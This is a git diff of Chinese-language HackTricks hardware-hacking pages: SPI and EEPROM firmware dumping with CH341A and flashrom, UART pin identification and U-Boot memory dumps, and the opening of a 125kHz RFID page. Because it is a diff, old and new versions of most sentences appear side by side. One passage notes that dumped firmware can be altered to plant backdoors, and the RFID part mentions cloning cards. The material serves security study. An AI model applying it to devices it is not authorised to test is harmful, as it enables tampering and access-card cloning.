SPI串行外围接口是一种用于嵌入式系统的同步串行通信协议用于IC集成电路之间的短距离通信。SPI通信协议利用由时钟和片选信号编排的主从架构。主从架构包括一个主设备通常是微处理器负责管理外部外设EEPROM、传感器、控制设备等这些外设被视为从设备。
SPI串行外设接口)是一种同步串行通信协议,用于嵌入式系统中 IC集成电路之间的短距离通信。SPI 通信协议利用主从架构,由时钟和芯片选择信号进行协调。主从架构由一个主设备(通常是微处理器)管理外部外设,如 EEPROM、传感器、控制设备等这些外设被视为从设备。
一个主设备可以连接多个从设备但从设备之间无法直接通信。从设备由时钟和片选两个引脚管理。由于SPI是一种同步通信协议输入和输出引脚遵循时钟信号。片选由主设备用于选择从设备并与其交互。当片选为高电平时从设备未被选中而当片选为低电平时片选已被选中主设备将与从设备交互。
多个从设备可以连接到一个主设备,但从设备之间不能相互通信。从设备由两个引脚管理,时钟和芯片选择。由于 SPI 是一种同步通信协议,输入和输出引脚遵循时钟信号。芯片选择由主设备用于选择一个从设备并与之交互。当芯片选择为高时,从设备未被选择,而当其为低时,芯片已被选择,主设备将与从设备进行交互。
MOSI设备输出从设备输入和MISO主设备输入从设备输出负责发送和接收数据。数据通过MOSI引脚发送到从设备同时片选保持低电平。输入数据包含从设备供应商数据表中的指令、内存地址或数据。在接收到有效输入后MISO引脚负责向主设备传输数据。输出数据将在输入结束后的下一个时钟周期准确发送。MISO引脚传输数据直到数据完全传输或主设备将片选引脚置为高电平在这种情况下从设备将停止传输主设备在该时钟周期后将不再监听)。
MOSI输出,从输入)和 MISO主输入从输出负责数据的发送和接收。数据通过 MOSI 引脚发送到从设备同时保持芯片选择为低。输入数据包含指令、内存地址或根据从设备供应商的数据表的数据。在有效输入后MISO 引脚负责将数据传输到主设备。输出数据在输入结束后的下一个时钟周期发送。MISO 引脚在数据完全传输完毕之前会持续传输数据,或者主设备将芯片选择引脚设置为高(在这种情况下,从设备将停止传输,主设备在下一个时钟周期后将不再接收)。
## 从EEPROM中转储固件
## 从 EEPROM 中转储固件
从EEPROM中转储固件对于分析固件并发现其中的漏洞非常有用。通常情况下固件在互联网上不可用或者由于诸如型号、版本等因素的变化而变得无关紧要。因此直接从物理设备中提取固件可以帮助在寻找威胁时更具体
转储固件对于分析固件和发现其中的漏洞非常有用。很多时候,固件在互联网上不可用,或者由于型号、版本等因素的变化而无关紧要。因此,直接从物理设备提取固件可以在寻找威胁时提供特定的帮助
获取串行控制台可能很有帮助,但通常情况下,文件是只读的。由于各种原因,这会限制分析。例如,固件中可能没有发送和接收数据包所需的工具。因此,将二进制文件提取出来以进行逆向工程是不可行的。因此,在系统上转储整个固件并提取用于分析的二进制文件可能非常有帮助。
获取串行控制台可能会很有帮助,但很多时候文件是只读的。这限制了分析的进行,原因有很多。例如,发送和接收数据包所需的工具可能不在固件中。因此,提取二进制文件进行逆向工程是不可行的。因此,将整个固件转储到系统中并提取二进制文件进行分析会非常有帮助。
此外,在进行红队渗透测试并获得物理设备访问权限时,转储固件可以帮助修改文件或注入恶意文件,然后将其重新刷入内存,这有助于在设备中植入后门。因此,固件转储可以解锁许多可能性。
此外,在红队行动和获取设备的物理访问权限时,转储固件可以帮助修改文件或注入恶意文件,然后将其重新闪存到内存中,这可能有助于在设备中植入后门。因此,通过固件转储可以解锁许多可能性。
### CH341A EEPROM编程器和读卡
### CH341A EEPROM 编程器和读取
该设备是一种廉价工具可用于从EEPROM中转储固件并使用固件文件重新刷写它们。这已成为处理计算机BIOS芯片仅为EEPROM的热门选择。该设备通过USB连接需要最少的工具即可开始使用。此外它通常可以快速完成任务因此在物理设备访问中也可能很有帮助。
将EEPROM存储器与CH341a编程器连接并将设备插入计算机。如果设备未被检测到请尝试在计算机上安装驱动程序。此外请确保EEPROM以正确的方向连接通常将VCC引脚放置在与USB连接器相反的方向否则软件将无法检测到芯片。如有需要请参考下图
该设备是一个廉价的工具,用于从 EEPROM 中转储固件,并使用固件文件重新闪存。这是处理计算机 BIOS 芯片(实际上就是 EEPROM的热门选择。该设备通过 USB 连接,并需要最少的工具即可开始使用。此外,它通常能快速完成任务,因此在物理设备访问中也很有帮助。
![drawing](../../.gitbook/assets/board\_image\_ch341a.jpg)
最后使用flashrom、G-FlashGUI等软件来转储固件。G-Flash是一个简单的GUI工具快速检测EEPROM。这对于快速提取固件可能非常有帮助而无需过多研究文档。
将 EEPROM 存储器连接到 CH341A 编程器,并将设备插入计算机。如果设备未被检测到,请尝试在计算机上安装驱动程序。此外,请确保 EEPROM 以正确的方向连接(通常将 VCC 引脚反向放置到 USB 连接器),否则软件将无法检测到芯片。如有需要,请参考图示:
![drawing](../../.gitbook/assets/connect\_wires\_ch341a.jpg) ![drawing](../../.gitbook/assets/eeprom\_plugged\_ch341a.jpg)
最后,使用 flashrom、G-FlashGUI等软件转储固件。G-Flash 是一个快速的最小 GUI 工具,能够自动检测 EEPROM。这在需要快速提取固件时非常有用而无需过多调整文档。
![drawing](../../.gitbook/assets/connected\_status\_ch341a.jpg)
转储固件后可以对二进制文件进行分析。可以使用诸如strings、hexdump、xxd、binwalk等工具来提取有关固件以及整个文件系统的大量信息。
转储固件后,可以对二进制文件进行分析。可以使用 strings、hexdump、xxd、binwalk 等工具提取有关固件以及整个文件系统的大量信息。
要从固件中提取内容可以使用binwalk。Binwalk分析十六进制签名并识别二进制文件中的文件并能够提取它们。
要从固件中提取内容,可以使用 binwalk。Binwalk 分析十六进制签名并识别二进制文件中的文件,并能够提取它们。
```
binwalk -e <filename>
```
固件可以是根据使用的工具和配置而定的 .bin 或 .rom 文件
可以是 .bin 或 .rom具体取决于使用的工具和配置
{% hint style="danger" %}
请注意,固件提取是一个细致的过程,需要耐心等待。任何处理不当都有可能损坏固件,甚至完全擦除固件并使设备无法使用。建议在尝试提取固件之前先研究具体设备。
请注意,固件提取是一个精细的过程,需要大量的耐心。任何处理不当都可能导致固件损坏,甚至完全擦除,使设备无法使用。建议在尝试提取固件之前,先研究特定设备。
{% endhint %}
### 怪盗客 + flashrom
### Bus Pirate + flashrom
![](<../../.gitbook/assets/image (910).png>)
请注意,即使怪盗客的 PINOUT 指示了用于连接到 SPI 的 **MOSI****MISO** 引脚,但有些 SPI 可能将引脚标记为 DI 和 DO。**MOSI -> DI, MISO -> DO**
请注意,即使 Pirate Bus 的引脚图指示用于连接 SPI 的 **MOSI****MISO** 引脚,某些 SPI 可能将引脚标记为 DI 和 DO。 **MOSI -> DI, MISO -> DO**
![](<../../.gitbook/assets/image (360).png>)
在 Windows 或 Linux 中,您可以使用 [**`flashrom`**](https://www.flashrom.org/Flashrom) 程序来转储闪存内存的内容,运行类似以下命令:
在 Windows 或 Linux 上,您可以使用程序 [**`flashrom`**](https://www.flashrom.org/Flashrom) 来转储闪存内容,运行类似以下命令:
```bash
# In this command we are indicating:
# -VV Verbose
@ -71,16 +74,17 @@ binwalk -e <filename>
# -r <file> Image to save in the filesystem
flashrom -VV -c "W25Q64.V" -p buspirate_spi:dev=COM3 -r flash_content.img
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# UART
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,76 +31,76 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
## 基本信息
UART是一种串行协议意味着它一次传输一个比特的数据。相比之下并行通信协议通过多个通道同时传输数据。常见的串行协议包括RS-232、I2C、SPI、CAN、Ethernet、HDMI、PCI Express和USB。
UART 是一种串行协议,意味着它一次传输一个比特的数据。相比之下,平行通信协议通过多个通道同时传输数据。常见的串行协议包括 RS-232、I2C、SPI、CAN、以太网、HDMI、PCI Express 和 USB。
通常,当UART处于空闲状态时线路保持高电平逻辑1值。然后为了表示数据传输的开始送器向接收器发送起始位在此期间信号保持低电平逻辑0值。接下来发送器发送包含实际消息的五到八个数据位然后是一个可选的奇偶校验位和一个或两个停止位逻辑1值具体取决于配置。奇偶校验位用于错误检查在实践中很少见。停止位(或位)表示传输结束。
通常,在 UART 处于空闲状态时,线路保持高电平(逻辑 1 值)。然后,为了表示数据传输的开始,发射器向接收器发送一个起始位,此时信号保持低电平(逻辑 0 值)。接下来,发射器发送五到八个数据位,包含实际消息,后面跟着一个可选的奇偶校验位和一个或两个停止位(逻辑 1 值),具体取决于配置。用于错误检查的奇偶校验位在实际中很少见。停止位(或位)表示传输结束。
我们称最常见的配置为8N1八个数据位无奇偶校验一个停止位。例如如果我们想要在8N1 UART配置中发送字符C或ASCII中的0x43我们将发送以下位0起始位0、1、0、0、0、0、1、1二进制0x43的值以及0停止位
我们称最常见的配置为 8N1八个数据位无奇偶校验和一个停止位。例如如果我们想在 8N1 UART 配置中发送字符 C或 0x43 的 ASCII 码我们将发送以下位0起始位0, 1, 0, 0, 0, 0, 1, 10x43 的二进制值),和 0停止位
![](<../../.gitbook/assets/image (764).png>)
与UART通信的硬件工具
UART 通信的硬件工具:
- USB转串口适配器
- 带有CP2102或PL2303芯片的适配器
- 通用工具Bus Pirate、Adafruit FT232H、Shikra或Attify Badge
* USB 转串口适配器
* 带有 CP2102 或 PL2303 芯片的适配器
* 多功能工具Bus Pirate、Adafruit FT232H、Shikra Attify Badge
### 识别UART端口
### 识别 UART 端口
UART有4个端口**TX**(发送)、**RX**(接收)、**Vcc**(电压)和**GND**。您可能会在PCB上找到带有**`TX`**和**`RX`**字样的4个端口。但如果没有指示,您可能需要使用**万用表**或**逻辑分析仪**自行查找。
UART 4 个端口:**TX**(发送)、**RX**(接收)、**Vcc**(电压)和 **GND**(接地)。您可能会在 PCB 上找到带有 **`TX`** 和 **`RX`** 字母的 4 个端口。但如果没有指示,您可能需要使用 **万用表** **逻辑分析仪** 自行查找。
使用**万用表**和设备关闭时
使用 **万用表** 并关闭设备电源
- 使用**连续性测试**模式来识别**GND**引脚将后端插入地线用红色探针测试直到听到万用表发出声音。在PCB上可能会找到几个GND引脚因此您可能已经找到或未找到属于UART的引脚。
- 要识别**VCC端口**,设置**直流电压模式**并将其设置为20V电压。黑色探针接地红色探针接引脚。打开设备电源。如果万用表测量到3.3V或5V的恒定电压则找到了Vcc引脚。如果得到其他电压,请尝试其他端口。
- 要识别**TX** **端口****直流电压模式**最高20V电压黑色探针接地红色探针接引脚打开设备电源。如果发现电压在几秒钟内波动然后稳定在Vcc值您很可能找到了TX端口。这是因为在上电时,它会发送一些调试数据。
- **RX端口**将是其他3个端口中最接近的一个其电压波动最小所有UART引脚中的总值最低。
* 要识别 **GND** 引脚,请使用 **连续性测试** 模式将黑色引线放入接地并用红色引线测试直到听到万用表发出声音。PCB 上可能会找到多个 GND 引脚,因此您可能找到或未找到属于 UART 的引脚。
* 要识别 **VCC 端口**,请设置 **直流电压模式** 并将其设置为 20 V 电压。黑色探头接地,红色探头接引脚。打开设备电源。如果万用表测量到恒定电压为 3.3 V 或 5 V您就找到了 Vcc 引脚。如果测得其他电压,请尝试其他端口。
* 要识别 **TX** **端口**,将 **直流电压模式** 设置为 20 V 电压,黑色探头接地,红色探头接引脚,并打开设备电源。如果您发现电压波动几秒钟后稳定在 Vcc 值,您很可能找到了 TX 端口。这是因为在开机时,它会发送一些调试数据。
* **RX 端口** 是与其他 3 个端口最接近的,它的电压波动最低,所有 UART 引脚中整体值最低。
您可能会混淆TX和RX端口什么都不会发生但如果混淆GND和VCC端口,可能会烧毁电路。
您可以混淆 TX 和 RX 端口,没什么问题,但如果混淆 GND 和 VCC 端口,可能会烧毁电路。
在某些目标设备中制造商通过禁用RX或TX甚至两者都禁用来禁用UART端口。在这种情况下追踪电路板中的连接并找到一些分支点可能会有所帮助。关于确认未检测到UART和电路断开的强烈提示是检查设备保修。如果设备已经附带了一些保修制造商会留下一些调试接口在本例中为UART因此必须已经断开了UART并且在调试时会重新连接。这些分支引脚可以通过焊接或跳线线连接。
在某些目标设备中,制造商通过禁用 RX TX甚至两者来禁用 UART 端口。在这种情况下,追踪电路板中的连接并找到一些断点可能会有所帮助。确认没有检测到 UART 和电路断开的一个强烈提示是检查设备保修。如果设备附带某些保修,制造商会留下某些调试接口(在这种情况下是 UART因此必须断开 UART并在调试时重新连接。这些断点引脚可以通过焊接或跳线连接。
### 识别UART波特率
### 识别 UART 波特率
识别正确的波特率的最简单方法是查看**TX引脚的输出并尝试读取数据**。如果收到的数据无法读取请切换到下一个可能的波特率直到数据可读。您可以使用USB转串口适配器或与辅助脚本配对的通用设备如Bus Pirate来执行此操作例如[baudrate.py](https://github.com/devttys0/baudrate/)。最常见的波特率是9600、38400、19200、57600和115200。
识别正确波特率的最简单方法是查看 **TX 引脚的输出并尝试读取数据**。如果您收到的数据不可读,请切换到下一个可能的波特率,直到数据变得可读。您可以使用 USB 转串口适配器或像 Bus Pirate 这样的多功能设备来做到这一点,并配合一个辅助脚本,例如 [baudrate.py](https://github.com/devttys0/baudrate/)。最常见的波特率为 9600、38400、19200、57600 和 115200。
{% hint style="danger" %}
重要提示在此协议中您需要将一个设备的TX连接到另一个设备的RX
请注意,在此协议中,您需要将一个设备的 TX 连接到另一个设备的 RX
{% endhint %}
## CP210X UART转TTY适配器
## CP210X UART 到 TTY 适配器
CP210X芯片用于许多原型板如NodeMCU带有esp8266用于串行通信。这些适配器相对便宜,可用于连接目标的UART接口。该设备有5个引脚5V、GND、RXD、TXD、3.3V。确保将电压连接目标支持的电压以避免任何损坏。最后将适配器的RXD引脚连接到目标的TXD将适配器的TXD引脚连接到目标的RXD。
CP210X 芯片广泛用于许多原型板,如 NodeMCU带 esp8266进行串行通信。这些适配器相对便宜,可用于连接目标的 UART 接口。该设备有 5 个引脚5V、GND、RXD、TXD、3.3V。确保连接目标支持的电压,以避免任何损坏。最后,将适配器的 RXD 引脚连接到目标的 TXD引脚将适配器的 TXD 引脚连接到目标的 RXD。
如果适配器未被检测到,请确保在主机系统中安装了CP210X驱动程序。一旦检测到并连接了适配器可以使用picocom、minicom或screen等工具。
如果适配器未被检测到,请确保主机系统中已安装 CP210X 驱动程序。一旦适配器被检测到并连接,可以使用 picocom、minicom 或 screen 等工具。
要列出连接到Linux/MacOS系统的设备
要列出连接到 Linux/MacOS 系统的设备:
```
ls /dev/
```
要与UART接口进行基本交互,请使用以下命令:
对于与UART接口的基本交互,请使用以下命令:
```
picocom /dev/<adapter> --baud <baudrate>
```
对于 minicom使用以下命令进行配置:
对于minicom使用以下命令进行配置
```
minicom -s
```
配置`串口设置`选项中的波特率和设备名称等设置
配置 `Serial port setup` 选项中的波特率和设备名称
配置完成后,使用`minicom`命令启动UART控制台。
配置完成后,使用命令 `minicom` 启动 UART 控制台。
## 通过Arduino UNO R3进行UART连接可拆卸Atmel 328p芯片板)
## 通过 Arduino UNO R3 的 UART可拆卸的 Atmel 328p 芯片板)
如果没有UART串口到USB适配器可用可以通过快速hack使用Arduino UNO R3。由于Arduino UNO R3通常随处可得这可以节省大量时间。
如果没有可用的 UART 串行到 USB 适配器,可以通过快速黑客技术使用 Arduino UNO R3。由于 Arduino UNO R3 通常随处可用,这可以节省很多时间。
Arduino UNO R3板上已经内置了USB到串口适配器。要获得UART连接只需从板上拔下Atmel 328p微控制器芯片。这个hack适用于Arduino UNO R3变种其上没有焊接Atmel 328p芯片采用SMD版本。将Arduino的RX引脚数字引脚0连接到UART接口的TX引脚将Arduino的TX引脚数字引脚1连接到UART接口的RX引脚。
Arduino UNO R3 板上内置了 USB 到串行适配器。要获取 UART 连接,只需将 Atmel 328p 微控制器芯片从板上拔出。此黑客技术适用于 Atmel 328p 未焊接在板上的 Arduino UNO R3 变体(使用的是 SMD 版本)。将 Arduino 的 RX 引脚(数字引脚 0连接到 UART 接口的 TX 引脚,将 Arduino 的 TX 引脚(数字引脚 1连接到 UART 接口的 RX 引脚。
最后,建议使用Arduino IDE获取串行控制台。在菜单中的`工具`部分中,选择`串行控制台`选项并根据UART接口设置波特率。
最后,建议使用 Arduino IDE 获取串行控制台。在菜单的 `tools` 部分,选择 `Serial Console` 选项,并根据 UART 接口设置波特率。
## 怪盗船长
## Bus Pirate
在这种情况下,我们将窃取Arduino的UART通信该通信将所有程序的打印发送到串行监视器。
在这种情况下,我们将嗅探 Arduino 的 UART 通信,该通信将程序的所有打印信息发送到串行监视器。
```bash
# Check the modes
UART>m
@ -171,54 +172,55 @@ Escritura inicial completada:
AAA Hi Dreg! AAA
waiting a few secs to repeat....
```
## 使用UART控制台转储固件
## Dumping Firmware with UART Console
UART控制台提供了在运行时环境中处理底层固件的绝佳方式。但是当UART控制台访问是只读时可能会引入许多限制。在许多嵌入式设备中固件存储在EEPROM中并在具有易失性内存的处理器中执行。因此固件保持为只读因为制造过程中的原始固件位于EEPROM本身中任何新文件都会由于易失性内存而丢失。因此,在处理嵌入式固件时,转储固件是一项有价值的工作。
UART Console 提供了一种在运行时环境中与底层固件进行交互的好方法。但是,当 UART Console 访问为只读时,可能会引入许多限制。在许多嵌入式设备中,固件存储在 EEPROM 中,并在具有易失性内存的处理器中执行。因此,固件保持只读状态,因为制造时的原始固件就在 EEPROM 内部,任何新文件都可能因易失性内存而丢失。因此,在处理嵌入式固件时,转储固件是一项有价值的工作。
许多方法可以做到这一点SPI部分涵盖了使用各种设备直接从EEPROM提取固件的方法。尽管如此建议首先尝试使用UART转储固件因为使用物理设备和外部交互转储固件可能存在风险。
很多方法可以做到这一点SPI 部分涵盖了使用各种设备直接从 EEPROM 中提取固件的方法。尽管如此,建议首先尝试使用 UART 转储固件,因为使用物理设备和外部交互转储固件可能存在风险。
UART控制台转储固件需要首先访问引导加载程序。许多知名供应商使用uboot通用引导加载程序作为其引导加载程序来加载Linux。因此访问uboot是必要的。
UART Console 转储固件需要首先获取对引导加载程序的访问权限。许多流行的供应商使用 uboot通用引导加载程序作为其引导加载程序来加载 Linux。因此获取对 uboot 的访问权限是必要的。
要访问引导加载程序请将UART端口连接到计算机并使用任何串行控制台工具并保持设备的电源断开。设置准备就绪后,按下回车键并保持按住。最后,连接设备的电源并让其启动。
要访问引导加载程序,请将 UART 端口连接到计算机,并使用任何串行控制台工具,同时保持设备的电源断开。一旦设置完成,按下 Enter 键并保持不放。最后,连接设备的电源并让其启动。
这样做将中断uboot的加载并提供一个菜单。建议了解uboot命令并使用帮助菜单列出它们。这可能是`help`命令。由于不同供应商使用不同配置,因此有必要分别了解每个配置。
这样做将中断 uboot 的加载并提供一个菜单。建议了解 uboot 命令并使用帮助菜单列出它们。这可能是 `help` 命令。由于不同的供应商使用不同的配置,因此有必要分别理解每个配置。
通常,转储固件的命令是:
```
md
```
which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
这代表“内存转储”。这将把内存EEPROM 内容)转储到屏幕上。建议在开始过程之前记录串行控制台输出,以捕获内存转储。
Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
最后,只需从日志文件中剥离所有不必要的数据,并将文件存储为 `filename.rom`,然后使用 binwalk 提取内容:
```
binwalk -e <filename.rom>
```
这将列出根据在十六进制文件中找到的签名可能的EEPROM内容。
这将根据在十六进制文件中找到的签名列出 EEPROM 的可能内容。
尽管如此需要注意的是即使正在使用uboot也不总是情况如此。如果按Enter键没有任何反应请检查不同的键如空格键等。如果引导加载程序被锁定且无法中断则此方法将无效。要检查uboot是否是设备的引导加载程序请在设备启动时检查UART控制台的输出。在启动时可能会提到uboot。
虽然需要注意的是,即使正在使用 uboot它并不总是解锁的。如果 Enter 键没有任何反应,请检查其他键,如空格键等。如果引导加载程序被锁定且没有被中断,则此方法将无效。要检查 uboot 是否是设备的引导加载程序,请在设备启动时检查 UART 控制台的输出。它可能在启动时提到 uboot。
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **泄露**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# FZ - 125kHz RFID
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
##
## 介
有关125kHz标签工作原理的更多信息请查看
有关 125kHz 标签工作原理的更多信息,请查看:
{% content-ref url="../pentesting-rfid.md" %}
[pentesting-rfid.md](../pentesting-rfid.md)
@ -28,40 +29,40 @@
## 操作
有关这些类型标签的更多信息,请[**阅读此简介**](../pentesting-rfid.md#low-frequency-rfid-tags-125khz)。
有关这些类型标签的更多信息 [**请阅读此介绍**](../pentesting-rfid.md#low-frequency-rfid-tags-125khz)。
### 读取
尝试**读取**卡片信息。然后可以**模拟**它们。
尝试 **读取** 卡片信息。然后可以 **模拟** 它们。
{% hint style="warning" %}
